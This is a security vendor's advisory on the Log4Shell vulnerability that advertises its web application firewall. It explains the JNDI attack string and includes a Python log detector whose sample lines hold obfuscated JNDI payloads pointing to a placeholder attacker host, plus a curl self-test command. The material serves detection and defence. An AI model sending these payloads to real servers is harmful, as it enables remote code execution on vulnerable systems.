
Log4j vulnerability in the masses

A serious new vulnerability was identified in the popular Java logging library Log4j v2. It was assigned the ID CVE-2021-44228 (Apache Log4j2 Remote Code Execution) and a CVSS score of 10.0.

Imunify360 WAF provides protection from this vulnerability starting with rule set v4.31, released 13/12/2021. Rule set v4.32 (13/12/2021) added rules that counter WAF evasion techniques.

Web servers behind our WAF are protected from this attack when it is exploited over the web. Since the vulnerability can also be exploited through channels other than the web, we strongly recommend updating Apache Log4j to version 2.17.0 or later.


Log4Shell vulnerability incidents registered in the wild:

(chart: Log4Shell vulnerability incidents)

We have registered more than 2.2 million Log4j incidents since 13/12/2021.


Log4j Vulnerability details

The default configuration of Apache Log4j supports JNDI (Java Naming and Directory Interface) lookups that can execute arbitrary code provided by remote services such as LDAP, RMI, and DNS.

Attack string template:

${jndi:ldap://attacker_website/payload}

where

${ - the opening tag of a Log4j lookup

jndi: - tells Log4j to use the JNDI manager to resolve the lookup

ldap:// - the JNDI request will be resolved using the LDAP protocol

attacker_website - an attacker-controlled server

payload - the path sent to that server with the request


Such a string ends up in the web server's log. When Log4j processes the logged message and finds the lookup, it makes a request to the URL given in the JNDI string; base64-encoded commands carried in that URL could then be executed on a vulnerable device.

We see and successfully reject a lot of attack attempts like this one:

(screenshot: log4j attempts)
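As an added example (not code from the original post and not the Imunify360 rule set itself), a small Python detector that applies the same idea as the WAF anti-evasion rules to web server log lines: it first resolves the nested lower/upper and default-value lookups used to disguise ${jndi:, then flags whatever lookup survives. The sample log lines, the attacker.example host and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote
# Innermost ${...} lookup (no nested braces) and the JNDI prefix we hunt for.
_INNER = re.compile(r'\$\{([^${}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def _resolve(body):
    """Evaluate one innermost lookup as Log4j's substitutor roughly does: split off
    a ':-' default, apply lower/upper, else use the default; None = keep verbatim."""
    name, has_default, default = body.partition(':-')
    prefix, _, key = name.partition(':')
    if prefix.lower() == 'lower':
        return key.lower()
    if prefix.lower() == 'upper':
        return key.upper()
    return default if has_default else None

def normalize(text, max_rounds=16):
    """Collapse nested/obfuscated lookups inside-out. The round limit keeps the
    detector from looping on self-referential input (cf. CVE-2021-45046)."""
    def repl(m):
        out = _resolve(m.group(1))
        return m.group(0) if out is None else out
    for _ in range(max_rounds):
        new = _INNER.sub(repl, text)
        if new == text:
            break
        text = new
    return text

def classify(log_line):
    """'jndi' for a Log4Shell probe, 'lookup' for any other surviving lookup
    (e.g. ${ctx:apiversion}), None when the line carries no lookup at all."""
    text = normalize(unquote(log_line))
    if _JNDI.search(text):
        return 'jndi'
    return 'lookup' if '${' in text else None

def scan(lines):
    """(line_number, verdict) for every line that still carries a lookup."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]
# Constructed sample access-log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 403 0 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 403 0 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 403 0 "-" "curl/7.68.0"',
    '10.0.0.8 - - [13/Dec/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 403 0 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/a}"',
]
```

Running scan(SAMPLE_LOG) reports lines 1, 2, 3 and 5 as 'jndi'; the plain browser request on line 4 is not flagged.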

To test whether your server is protected against this attack, send the following test request:

curl -i 'http://your_protected_site/$\{jndi:ldap://127.0.0.1/c'

If the attack is blocked successfully, the response status should be "403 Forbidden" (the -i flag prints the response headers, including the status line).

The Log4j developers released version 2.15.0 to address CVE-2021-44228, but another attack vector was reported afterwards: CVE-2021-45046 (a JNDI lookup pattern resulting in a denial of service (DoS) attack). The DoS is possible through an infinite loop created by the recursive resolution of ${ctx:apiversion}.

Imunify360 WAF also protects web servers against CVE-2021-45046.


Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you focus on other business tasks. Imunify360 combines Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management and Domain Reputation with an easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.

Make your servers secure now!
